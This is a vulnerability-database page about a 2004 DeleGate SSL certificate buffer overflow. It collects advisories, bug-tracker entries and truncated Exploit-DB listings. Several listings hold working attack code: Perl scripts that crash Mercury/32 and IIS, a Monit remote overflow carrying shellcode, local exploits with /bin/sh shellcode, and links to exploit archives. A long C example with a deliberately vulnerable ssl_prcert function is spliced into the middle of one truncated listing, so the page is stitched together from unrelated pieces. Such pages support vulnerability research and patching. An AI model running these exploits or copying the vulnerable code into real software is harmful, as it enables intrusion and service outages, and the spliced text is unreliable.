CVE-2004-2003
Published: 2004-05-06
Priority: P3 (36) high
CVSS 2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public PoC available (see the Exploit-DB entry below)
EPSS: 6.55% (93.0th percentile)
Buffer overflow in the ssl_prcert function in the SSLway filter (sslway.c) for DeleGate 8.9.2 and earlier allows remote attackers to execute arbitrary code via a certificate with a long (1) subject or (2) issuer name field.
Affected
13 ranges are recorded, all for vendor delegate / product delegate; none of them carries a version bound or a fixed-in version on this page (the CVE description names DeleGate 8.9.2 and earlier).
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| delegate | delegate | — (13 identical ranges, no bounds given) | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vendor_redhat | — | 7.5 | HIGH | — |
GHSA
GHSA-frvx-gppg-h8rp (ghsa_unreviewed·2022-04-29) · CVE-2004-2003 [HIGH]
Buffer overflow in the ssl_prcert function in the SSLway filter (sslway.c) for DeleGate 8.9.2 and earlier allows remote attackers to execute arbitrary code via a certificate with a long (1) subject or (2) issuer name field.
Red Hat
CVE-2004-2760 [MEDIUM] openssh information disclosure
vendor_redhat·2004-04-12·CVSS 5.0
sshd in OpenSSH 3.5p1, when PermitRootLogin is disabled, immediately closes the TCP connection after a root login attempt with the correct password, but leaves the connection open after an attempt with an incorrect password, which makes it easier for remote attackers to guess the password by observing the connection state, a different vulnerability than CVE-2003-0190. NOTE: it could be argued that in most environments, this does not cross privilege boundaries without requiring leverage of a separate vulnerability.
Statement: The risks associated with fixing this bug are greater than the low severity security risk. We therefore currently have no plans to fix this flaw in Red Hat Enterprise Linux 2.1 which is in maintenance mode.
Red Hat
CVE-2003-0989 [HIGH] security flaw (tcpdump ISAKMP infinite loop)
vendor_redhat·2004-01-14·CVSS 7.5
tcpdump before 3.8.1 allows remote attackers to cause a denial of service (infinite loop) via certain ISAKMP packets, a different vulnerability than CVE-2004-0057.
Red Hat
CVE-2005-1730 [MEDIUM] Multiple vulnerabilities in the OpenSSL ASN.1 parser
vendor_redhat·CVSS 5.0
Multiple vulnerabilities in the OpenSSL ASN.1 parser, as used in Novell iManager 2.0.2, allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted packets, as demonstrated by "OpenSSL ASN.1 brute forcer." NOTE: this issue might overlap CVE-2004-0079, CVE-2004-0081, or CVE-2004-0112.
Statement: Based on our research we believe that the "OpenSSL ASN.1 brute forcer." is actually exploiting flaws CVE-2003-0543, CVE-2003-0544, CVE-2003-0545. Those issues are all addressed in Red Hat Enterprise Linux and therefore CVE-2005-1730 is a duplicate assignment.
No detection rules found.
Exploit-DB
CVE-2010-3404 eshtery CMS - SQL Injection
exploitdb·2010-09-12
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub12-eshtery-cms-sql-injection-vulnerability/
'''
Abysssec Inc Public Advisory
Title : eshtery CMS Sql Injection Vulnerability
Affected Version : eshtery copyrights 2003-2004
Discovery : www.abysssec.com
Vendor : http://eshtery.she7ata.com/projects/eshtery/
Demo : http://eshtery.she7ata.com/projects/eshtery/
Download Links : http://sourceforge.net/projects/eshtery/
Description :
1) SQL Injection
For a successful injection in this CMS you have to pass two steps.
Step 1:
Go to this path:
http://Example.com/catlgsearch.aspx
and enter this value
Exploit-DB
CVE-2008-0118 Microsoft Office 2000/2003/2004/XP - File Memory Corruption
exploitdb·2008-03-07
---
source: https://www.securityfocus.com/bid/28146/info
Microsoft Office is prone to a remote memory-corruption vulnerability.
An attacker could exploit this issue by enticing a victim to open a malicious Office file.
Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31361.tgz
Exploit-DB
CVE-2005-4131 Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
exploitdb·2005-12-08
---
source: https://www.securityfocus.com/bid/15780/info
Microsoft Excel is susceptible to a remote code-execution vulnerability. This issue was originally disclosed through an eBay auction that has since been terminated.
This issue is due to the application's failure to properly bounds-check user-supplied input data in the 'Named Range' definition in Excel data files. This results in the corruption of critical memory sections, allowing code execution.
The following is a proof-of-concept example segment of an Excel data file. The '*' characters represent the location of the affected value that triggers this issue. Setting these locations to '0xFF' will crash the application.
00000720 00 80 00 ff 93 02 04 00
Exploit-DB
CVE-2003-0609 Solaris 2.6/7/8/9 (SPARC) - 'ld.so.1' Local Privilege Escalation
exploitdb·2004-12-24
---
/*
* $Id: raptor_ldpreload.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_ldpreload.c - ld.so.1 local, Solaris/SPARC 2.6/7/8/9
* Copyright (c) 2003-2004 Marco Ivaldi
*
* Stack-based buffer overflow in the runtime linker, ld.so.1, on Solaris 2.6
* through 9 allows local users to gain root privileges via a long LD_PRELOAD
* environment variable (CAN-2003-0609).
*
* This exploit uses the ret-into-ld.so technique, to effectively bypass the
* non-executable stack protection (noexec_user_stack=1 in /etc/system). This
* is a weird vulnerability indeed: the standard ret-into-stack doesn't seem
* to work properly for some reason (SEGV_ACCERR), and at least my version of
* Solaris 8 (Generic_108528-13) is very hard to exploi
Exploit-DB
CVE-2003-0834 Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)
exploitdb·2004-12-24
---
/*
* $Id: raptor_libdthelp.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_libdthelp.c - libDtHelp.so local, Solaris/SPARC 7/8/9
* Copyright (c) 2003-2004 Marco Ivaldi
*
* Buffer overflow in CDE libDtHelp library allows local users to execute
* arbitrary code via a modified DTHELPUSERSEARCHPATH environment variable
* and the Help feature (CAN-2003-0834).
*
* Possible attack vectors are: DTHELPSEARCHPATH (as used in this exploit),
* DTHELPUSERSEARCHPATH, LOGNAME (those two require a slightly different
* exploitation technique, due to different code paths).
*
* Usage:
* $ gcc raptor_libdthelp.c -o raptor_libdthelp -Wall
* [on your xserver: disable the access control]
* $ ./raptor_libdthelp 192.168.1.1:0
* [on your xserver: ent
Exploit-DB
CVE-2004-1306 Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow
exploitdb·2004-12-23
---
source: https://www.securityfocus.com/bid/12091/info
Microsoft Windows is prone to an integer overflow vulnerability. This issue exists in 'winhlp32.exe' and is exposed when a malformed phrase compressed Windows Help file (.hlp) is processed by the program.
Successful exploitation may allow execution of arbitrary code in the context of the user that opens the malicious Help file. The Help file may originate from an external or untrusted source, so this vulnerability is considered remote in nature.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25049.gz
Exploit-DB
CVE-2004-2513 Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
exploitdb·2004-12-01
---
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl
# Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
#############################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";
sleep(1);
print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";
sleep(1);
print $socket "0001 CHECK " . "A" x 512 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====
# milw0rm.com [2004-12-01]
Exploit-DB
CVE-2004-1050 Microsoft Internet Explorer 6 - IFRAME Tag Buffer Overflow
exploitdb·2004-11-02
---
BoF PoC exploit
Copyright (C) 2003, 2004 by Berend-Jan Wever.
http://www.edup.tudelft.nl/~bjwever
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
A copy of the GNU General Public License can be found at:
http://www.gnu.org/licenses/gpl.html
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston,
Exploit-DB
CVE-2003-0718 Microsoft IIS - WebDAV XML Denial of Service (MS04-030)
exploitdb·2004-10-20
---
#!/usr/bin/perl
# IIS BlowOut
# POC exploit for MS04-030. Found by Amit Klein.
# incognito_ergo yahoo com
# usage: perl ms04-030_spl.pl host port
use IO::Socket;
$port = $ARGV[1];
$host = $ARGV[0];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort =>
$port,Proto => "TCP");
for ($count=1; $count\r\n\r\n\r\n\r\n\r\n";
$l=length($xmldata);
$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost:
$host\nContent-length: $l\n\n$xmldata\n\n";
syswrite($socket,$req,length($req));
close $socket;
# milw0rm.com [2004-10-20]
Exploit-DB
CVE-2004-0213 Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
exploitdb·2004-07-17
---
/* Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit (MS04-020)
*
* Tested on windows 2k sp4 CN,NT/XP/2003 NOT TESTED
*
* Posixexp.c By bkbll (bkbll cnhonker net,bkbll tom com) www cnhonker com
*
* 2004/07/16
*
* thanks to eyas xfocus org
*
*
C:\>whoami
VITUALWIN2K\test
C:\>posixexp
Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1
By bkbll (bkbll#cnhonker.net,bkbll#tom.com) www.cnhonker.com
pax: illegal option--h
Usage: pax -[cimopuvy] [-f archive] [-s replstr] [-t device] [pattern.
pax -r [-cimopuvy] [-f archive] [-s replstr] [-t device] [patte
pax -w [-adimuvy] [-b blocking] [-f archive] [-s replstr]
[-t device] [-x format] [pathname...]
pax -r -w [-ilmopuvy] [
Exploit-DB
CVE-2004-2519 Gattaca Server 2003 - 'web.tmpl?Language' CPU Consumption (Denial of Service)
exploitdb·2004-07-15
---
source: https://www.securityfocus.com/bid/10728/info
It is reported that Gattaca Server 2003 contains multiple denial of service vulnerabilities.
These vulnerabilities allow a remote attacker to crash the application, denying service to legitimate users.
Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these vulnerabilities as well.
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=http://www.example.com/web.tmpl?HEL
Exploit-DB
CVE-2004-2518 Gattaca Server 2003 - Null Byte Full Path Disclosure
exploitdb·2004-07-15
---
source: https://www.securityfocus.com/bid/10729/info
It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities.
By sending HTTP requests to Gattaca's web server, it is reportedly possible to cause the application to return error pages that contain the full installation path of the application and the web document root path.
These vulnerabilities could be used by an attacker to aid them in further attacks against the server.
Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these vulnerabilities as well.
http://www.example.com/%00
Exploit-DB
CVE-2004-2518 Gattaca Server 2003 - 'Language' Path Exposure
exploitdb·2004-07-15
---
source: https://www.securityfocus.com/bid/10729/info
It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities.
By sending HTTP requests to Gattaca's web server, it is reportedly possible to cause the application to return error pages that contain the full installation path of the application and the web document root path.
These vulnerabilities could be used by an attacker to aid them in further attacks against the server.
Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these vulnerabilities as well.
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever]
Exploit-DB
CVE-2004-0683 Norton AntiVirus - Denial of Service
exploitdb·2004-07-12
---
Norton AntiVirus Denial Of Service Vulnerability
*vulnerable [...only tested on!]
Symantec Norton AntiVirus 2003 Professional Edition
Symantec Norton AntiVirus 2002
*not vulnerable
Mcafee 7*
Mcafee 8*
Risk Impact: Medium
Remote: yes
Description:
While scanning [automatically or manually] certain specially crafted compressed files, NAV triggers a DoS, using 100% CPU for a very long time. Moreover, NAV is unable to stop the scan midway, even if the user tries to stop the virus scan manually.
In this situation the only alternative is to kill the process.
--- [Proof of Concept] ---
Please download this file.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/312.zip (av_bomb_3.zip) <--- For symantec.
The
Exploit-DB
CVE-2004-0445 Symantec Multiple Firewall - DNS Response Denial of Service
exploitdb·2004-05-16
---
/* HOD-symantec-firewall-DoS-expl.c:
*
* Symantec Multiple Firewall DNS Response Denial-of-Service
*
* Exploit version 0.1 coded by
*
*
* .::[ houseofdabus ]::.
*
*
*
* Bug discovered by eEye:
* http://www.eeye.com/html/Research/Advisories/AD20040512B.html
*
* -------------------------------------------------------------------
* Tested on:
* - Symantec Norton Personal Firewall 2004
*
*
* Systems Affected:
* - Symantec Norton Internet Security 2002
* - Symantec Norton Internet Security 2003
* - Symantec Norton Internet Security 2004
* - Symantec Norton Internet Security Professional 2002
* - Symantec Norton Internet Security Professional 2003
* - Symantec Norton Internet Security Professional 2004
* - Symantec Norton Persona
Exploit-DB
CVE-2004-0502 Microsoft Outlook 2003 - Predictable File Location
exploitdb·2004-05-10
---
source: https://www.securityfocus.com/bid/10307/info
Microsoft Outlook 2003 is reported to store files that are specified in img tags in predictable locations.
This may present a security risk because many known (and potential) Internet Explorer vulnerabilities depend on the attacker being able to directly reference malicious content on a victim system. Given both the ability to place such content on the file system and reference it specifically by location, exploitation of many browser-based vulnerabilities becomes possible.
Exploit-DB
CVE-2004-2003 DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow (PoC)
exploitdb·2004-05-06
---
source: https://www.securityfocus.com/bid/10295/info
A remote buffer overflow vulnerability has been reported in the DeleGate SSLway filter. This filter is employed when DeleGate applies SSL to arbitrary protocols.
The issue is due to insufficient boundary checks when copying user-supplied certificate field contents (the subject and issuer names) into fixed-size buffers.
A remote attacker may exploit this issue to overwrite the return address of the static ssl_prcert() function, or any other saved value that lies within 768 bytes of the end of the affected buffers.
It has been reported that the X509_NAME_oneline() function will perform character conversion on characters below '0x20' or ab
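The check that is missing in the pattern described above is worth seeing in code. The following C is an added example, not code from DeleGate, from sslway.c or from the Exploit-DB entry. It models the rendering rule the advisory attributes to X509_NAME_oneline() (bytes below 0x20 or above 0x7e come out as \xHH, so each such byte costs four output characters) with a small function of its own rather than linking OpenSSL; the function names, the 256-byte buffer size and the constructed subject name are assumptions chosen for illustration. The point it demonstrates is that the length to bound is the rendered length, not the raw field length, and that a buffer sized for a "normal" DN is overrun by a subject that is only a quarter of that size in raw bytes.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Simplified model of X509_NAME_oneline() escaping, as described in the
 * advisory: bytes < 0x20 or > 0x7e render as \xHH (4 characters each).
 * This is an assumption for illustration, not OpenSSL's code. */
size_t dn_escaped_len(const unsigned char *dn, size_t n)
{
    size_t out = 0;
    for (size_t i = 0; i < n; i++)
        out += (dn[i] < 0x20 || dn[i] > 0x7e) ? 4 : 1;
    return out;
}

/* Render dn into dst with the same rule; returns characters written (no NUL).
 * Performs no bounds check itself: callers must size dst from dn_escaped_len(). */
static size_t dn_render_unchecked(char *dst, const unsigned char *dn, size_t n)
{
    static const char hex[] = "0123456789abcdef";
    size_t o = 0;
    for (size_t i = 0; i < n; i++) {
        if (dn[i] < 0x20 || dn[i] > 0x7e) {
            dst[o++] = '\\'; dst[o++] = 'x';
            dst[o++] = hex[dn[i] >> 4]; dst[o++] = hex[dn[i] & 0xf];
        } else {
            dst[o++] = (char)dn[i];
        }
    }
    dst[o] = '\0';
    return o;
}

#define PRCERT_BUF 256   /* assumed fixed stack buffer size, for illustration */

/* Vulnerable pattern (kept for comparison, never called with untrusted input):
 * the buffer is sized for a plausible DN, but the rendered length is
 * attacker-controlled and up to 4x the raw length, and nothing checks it.
 * A subject of 64 non-printable bytes already fills all 256 bytes. */
void ssl_prcert_vulnerable(const unsigned char *subject, size_t n)
{
    char buf[PRCERT_BUF];
    dn_render_unchecked(buf, subject, n);   /* no bound: stack overflow */
    printf("subject=%s\n", buf);
}

/* Hardened form: compute the rendered length first and refuse anything that
 * does not fit together with its terminating NUL. Returns 0 on success,
 * -1 if the DN was rejected. */
int ssl_prcert_bounded(char *buf, size_t bufsz,
                       const unsigned char *subject, size_t n)
{
    size_t need = dn_escaped_len(subject, n);
    if (need >= bufsz)
        return -1;                          /* would overflow: reject */
    dn_render_unchecked(buf, subject, n);   /* safe: length already checked */
    return 0;
}

/* Largest raw DN (all printable, or all non-printable) that fits in bufsz. */
size_t max_raw_bytes(size_t bufsz, int printable)
{
    return (bufsz - 1) / (printable ? 1 : 4);
}

/* Demo helper: a constructed subject of n control bytes (0x01) against the
 * hardened function, so the outcome can be checked by name. */
int demo_control_dn_result(size_t n)
{
    char buf[PRCERT_BUF];
    unsigned char cn[512];
    if (n > sizeof cn)
        return -2;
    memset(cn, 0x01, n);                    /* constructed input */
    return ssl_prcert_bounded(buf, sizeof buf, cn, n);
}

int main(void)
{
    unsigned char cn[300];
    memset(cn, 0x01, sizeof cn);            /* constructed: 300 control bytes */
    printf("300 control bytes render to %zu characters\n",
           dn_escaped_len(cn, sizeof cn));
    printf("bounded copy of 300 control bytes: %s\n",
           demo_control_dn_result(300) == 0 ? "accepted" : "rejected");
    printf("bounded copy of 63 control bytes: %s\n",
           demo_control_dn_result(63) == 0 ? "accepted" : "rejected");
    printf("bounded copy of 64 control bytes: %s\n",
           demo_control_dn_result(64) == 0 ? "accepted" : "rejected");
    printf("max raw non-printable bytes in %d: %zu\n",
           PRCERT_BUF, max_raw_bytes(PRCERT_BUF, 0));
    return 0;
}
```

The hardened variant bounds the rendered length: 63 control bytes render to 252 characters and fit, 64 render to 256 and are rejected because there is no room for the terminator, while a check on the raw length (64 bytes against a 256-byte buffer) would have let both through. With the real API the equivalent is to pass the true buffer size to X509_NAME_oneline() or let it allocate, rather than rendering into a large buffer and copying into a fixed stack buffer afterwards.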
Exploit-DB
CVE-2004-0230 TCP Connection Reset - Remote Denial of Service
exploitdb·2004-04-23
---
/*
By: Paul A. Watson
Build a TCP packet - based on tcp1.c sample code from libnet-1.1.1
COMPILE:
gcc reset-tcp.c -o reset-tcp /usr/lib/libnet.a
or
gcc -o reset-tcp reset-tcp.c -lnet
** be sure to modify the MAC addresses (enet_src/enet_dst) in the code, or you WILL have problems!
EXECUTE:
reset-tcp [interface] [src ip] [src port] [dst ip] [dst port] [window size]
EXAMPLE (and timing packets sent with /bin/date):
[root@orc BGP]# date; ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 65536; date
Tue Dec 16 21:18:28 CST 2003
Packets sent: 8192 Sequence guess: 536805376
Packets sent: 16384 Sequence guess: 1073676288
Packets sent: 24576 Sequence guess: 1610547200
Packets sent: 32768 Sequence guess: 2147418112
Packets sent: 40960 Sequence guess
Exploit-DB
CVE-2003-1083 Monit 4.1 - Remote Buffer Overflow
exploitdb·2004-04-09
---
#!/usr/bin/perl
#
# monit \n\n";
exit(0);
}
print "HOST:\t$ARGV[0]\n";
print "PORT:\t2812\n";
my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; # esp mandrake 9.1
#my $buffer = "A" x 284 . "XXXX" . "B" x 100; #dos and debug
print "connecting to server...\n";
$socket = IO::Socket::INET -> new( PeerAddr => $ARGV[0],
PeerPort => 2812,
Proto => "tcp");
if(!defined($socket))
{
print "could not connect :-P\n";
sleep(1);
exit(0);
}
print "connected\n";
sleep(1);
print "sending string\n";
print $socket $buffer;
close $socket;
print "\ndosed!\n";
# milw0rm.com [2004-04-09]
Exploit-DB
CVE-2004-0077 [HIGH] Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator
exploitdb·2004-02-18·CVSS 7.2
---
/*
* Proof-of-concept exploit code for do_mremap() #2
*
* EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap() #1".
* EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/160/
*
*
* Copyright (C) 2004 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied
Exploit-DB
CVE-2003-0985 Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation
exploitdb·2004-01-15
---
/*
* Linux kernel mremap() bound checking bug exploit.
*
* Bug found by Paul Starzetz
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define str(s) #s
#define xstr(s) str(s)
#define DSIGNAL SIGCHLD
#define CLONEFL (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR 0x2000
#define
Exploit-DB
CVE-2003-0985 Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)
exploitdb·2004-01-06
---
/*
* EDB Note: This will just "test" the vulnerability.
* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
*/
/*
* Proof-of-concept exploit code for do_mremap()
*
* Copyright (C) 2004 Christophe Devine and Julien Tinnes
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General P
Exploit-DB
CVE-2004-0074 XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game
exploitdb·2004-01-02
---
/* 0x333xsok (2) => xsok 1.02 local game exploit
*
* Happy new year ! (2 :)
* coded by c0wboy
*
* (c) 0x333 Outsiders Security Labs / www.0x333.org
*
*/
#include
#include
#define BIN "/usr/games/xsok"
#define RETADD 0xbffffa3c
#define SIZE 200
unsigned char shellcode[] =
/* setregid (20,20) shellcode */
"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
"\xcd\x80"
/* exec /bin/sh shellcode */
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
int main (int argc, char ** argv)
{
int i, ret = RETADD;
char out[SIZE];
fprintf(stdout, "\n --- 0x333xsok => xsok 1.02 local games exploit ---\n");
fprintf(stdout, " --- Outsiders Se(c)urity Labs 2003 ---\n\n");
int *xsok = (int *)(o
Exploit-DB
CVE-2003-1083 Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun
exploitdb·2003-11-24
---
source: https://www.securityfocus.com/bid/9099/info
A buffer overrun vulnerability has been discovered in Monit 4.1 and earlier that could be exploited remotely to gain root privileges. The problem occurs due to insufficient bounds checking when handling overly long HTTP requests. As a result, it may be possible for a remote attacker to corrupt sensitive process data in such a way that the execution flow of Monit can be controlled.
Successful exploitation of this condition could potentially allow for the execution of arbitrary code with root privileges.
// Michel, http://www.cycom.se
#!/usr/bin/perl
#
# Monit 4.1 (possibly earlier too) remote shell exploit (HTTP)
# (C) 2004 by Shadowinteger
#
# Verbatim copying, distribution and/o
Bugzilla
CVE-2023-25775 [CRITICAL] kernel: irdma: Improper access control
bugzilla·2023-08-11·CVSS 9.8
Improper access control in the Intel(R) Ethernet Controller RDMA driver for linux before version 1.9.30 may allow an unauthenticated user to potentially enable escalation of privilege via network access.
References:
http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00794.html
Discussion:
Created kernel tracking bugs for this issue:
Affects: fedora-all [bug 2231416]
---
This was fixed for Fedora with the 6.4.16 stable kernel updates.
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 7
Via RHSA-2024:2003 https://access.redhat.com/errata/RHSA-2024:2003
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 7
Via RHSA-2024:2004 https://
Bugzilla
CVE-2003-0985 [HIGH] security flaw
bugzilla·2018-08-16·CVSS 7.2
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA, a different vulnerability than CAN-2004-0077.
Bugzilla
CVE-2003-0989 [HIGH] security flaw
bugzilla·2018-08-16·CVSS 7.5
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
tcpdump before 3.8.1 allows remote attackers to cause a denial of service (infinite loop) via certain ISAKMP packets, a different vulnerability than CVE-2004-0057.
Bugzilla
CVE-2004-0077 [HIGH] security flaw
bugzilla·2018-08-16·CVSS 7.2
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The do_mremap function for the mremap system call in Linux 2.2 to 2.2.25, 2.4 to 2.4.24, and 2.6 to 2.6.2, does not properly check the return value from the do_munmap function when the maximum number of VMA descriptors is exceeded, which allows local users to gain root privileges, a different vulnerability than CAN-2003-0985.
Bugzilla
CVE-2003-0987 [HIGH] httpd mod_digest nonce not verified
bugzilla·2008-01-28·CVSS 7.5
Common Vulnerabilities and Exposures assigned an identifier CVE-2003-0987 to the following vulnerability:
mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
References:
http://www.mail-archive.com/[email protected]/msg19007.html
http://www.mail-archive.com/[email protected]/msg19014.html
http://www.mandriva.com/security/advisories?name=MDKSA-2004:046
http://www.redhat.com/support/errata/RHSA-2004-600.html
http://www.redhat.com/support/errata/RHSA-2005-816.html
http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.529643
http://sunsolve.sun.com/search/document.do?assetkey=1-26-57628-1
http://sunsolve.sun.com/search/document
Bugzilla
CVE-2004-0096 [MEDIUM] mod_python remote DoS
bugzilla·2008-01-28·CVSS 5.0
Common Vulnerabilities and Exposures assigned an identifier CVE-2004-0096 to the following vulnerability:
Unknown vulnerability in mod_python 2.7.9 allows remote attackers to cause a denial of service (httpd crash) via a certain query string, a variant of CAN-2003-0973.
References:
http://www.modpython.org/pipermail/mod_python/2004-January/014879.html
http://security.gentoo.org/glsa/glsa-200401-03.xml
http://www.redhat.com/support/errata/RHSA-2004-058.html
http://www.redhat.com/support/errata/RHSA-2004-063.html
Discussion:
This was addressed via:
Red Hat Enterprise Linux version 2.1 (RHSA-2004:058)
Red Hat Enterprise Linux version 3 (RHSA-2004:058)
Red Hat Linux 9 (RHSA-2004:063)
Bugzilla
CVE-2003-0618 [LOW] leaks file existence information
bugzilla·2007-07-20·CVSS 2.1
Clone for RHEL3 tracking
+++ This bug was initially created as a clone of Bug #114923 +++
CAN-2003-0618 was reported 2003Jul29 to Debian. You can test for the
existence of files even if you don't have permission to do so by using
the suidperl command.
$ su
# mkdir ~root/delme; chmod 700 ~root/delme;touch ~root/delme/1
# exit
$ suidperl ~root/delme/1
Script is not setuid/setgid in suidperl
$ suidperl ~root/delme/2
Can't open perl script "/root/delme/2": No such file ...
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=220486
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=203426
Affects: 2.1AS 2.1ES 2.1AW 2.1WS (5.6.1)
Affects: 3AS 3ES 3WS (5.8.0)
Debian released an errata for this issue in Feb 2004.
-- Additional comment from mjc@redh
Bugzilla
CVE-2003-0542 [HIGH] multiple flaws in Apache (CVE-2003-0542, CVE-2003-0987, CVE-2004-0940)
bugzilla·2005-10-25·CVSS 7.2
Several security issues have been found in various packages in Stronghold
4.0:
A flaw in the handling of regular expressions from configuration files
in the Apache HTTP Server could lead to a buffer overflow. To exploit this
issue, an attacker would need to have the ability to write to Apache
configuration files such as .htaccess or httpd.conf. (CVE-2003-0542)
mod_digest did not properly verify the nonce of a client response by using
a AuthNonce secret. This could allow a malicious user who is able to sniff
network traffic to conduct a replay attack against a website using Digest
protection. Note that mod_digest implements an older version of the MD5
Digest Authentication specification which is known no
Bugzilla
CAN-2003-0977 fix pushed for RH9, but not FC1
bugzilla·2004-03-20
[MEDIUM] CAN-2003-0977 fix pushed for RH9, but not FC1
Description of problem:
CAN-2003-0977 fix pushed for RH9, but not FC1
Version-Release number of selected component (if applicable):
cvs-1.11.5-3
Additional info:
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=111221#c5
https://rhn.redhat.com/errata/RHSA-2004-003.html
http://ccvs.cvshome.org/servlets/NewsItemView?newsID=84
